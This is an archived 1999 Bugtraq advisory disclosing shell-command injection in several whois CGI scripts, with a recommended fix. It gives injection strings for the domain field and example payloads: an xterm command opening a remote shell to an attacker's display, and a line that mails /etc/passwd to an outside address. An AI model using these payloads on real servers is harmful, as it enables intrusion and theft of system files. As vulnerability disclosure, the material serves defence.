Bugtraq mailing list archives

Whois.cgi - ADVISORY.

From: hhp () HHP PERLX COM (Cody T. - hhp)
Date: Tue, 9 Nov 1999 20:51:58 -0600


  (hhp) Whois.CGI - ADVISORY. (hhp)
              hhp-ADV#12
         11/9/99 8:42:57pm CST
             By: loophole
 hhp () hhp perlx com - http://hhp.perlx.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What?:
Hole  in  several  known/unknown Whois CGI
packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Versions?:
1.) Whois Internic Lookup - version: 1.0
2.) CC Whois              - Version: 1.0
3.) Matt's Whois          - Version: 1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit!:
These versions allow execution of commands
due  to  lack  of  shell  escape character
parsing  if  the domain entries consist of
one of the following strings...
Note: (Strings  will  vary  for different
vulnerable versions.)

1.) ;commands
2.) ";commands
3.) ;commands;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Example!:
If the domain entries consist of:
1.) ;id
2.) ";id
or either,
3.) ;id;
you will see something like this:
'Whois Server Version 1.1

Domain names in the .com, .net, and .org
domains  can now be registered with many
different  competing  registrars.  Go to
http://www.internic.net for detailed
information. etc. etc. etc....
(scroll  to  the  bottom of the output.)
uid=501(blah) gid=500(blah)'
^^^^^\
      ` 'id' was executed on the server.

Other example commands can be ran also...
;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you () yourdomain com;
Etc, Etc.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Foo!:
     Alot of main *NIC* servers were found
running  vulnerable versions.  I am in the
process  of  contacting  the main servers,
and the software programmers to advise the
vulnerability.

     Very   well   known/used   sites  are
vulnerable (Which will rename nameless for
security  reasons).  I  tried  to  get  in
contact  with  them,  but being such a big
company/service,  I failed, so sad indeed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fix?:
     If  you run one of these bad scripts,
delete  it  and  point  your  browser  to:
http://cgi.resourceindex.com/Programs_and_
Scripts/Perl/Internet_Utilities/Whois/
and download one of the secure packages.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shouts to all of hhp.
Fuck you to gH for trying to rip this ADV
before I could release it.
---hhp-2t0--------------------------------

Current thread:

Re: FTP denial of service attack der Mouse (Dec 07)
- Whois.cgi - ADVISORY. Cody T. - hhp (Nov 09)
- Re: FTP denial of service attack Darren Reed (Dec 08)
- Re: FTP denial of service attack Phillip Susi (Dec 08)
- <Possible follow-ups>
- Re: FTP denial of service attack der Mouse (Dec 08)
- Re: FTP denial of service attack der Mouse (Dec 08)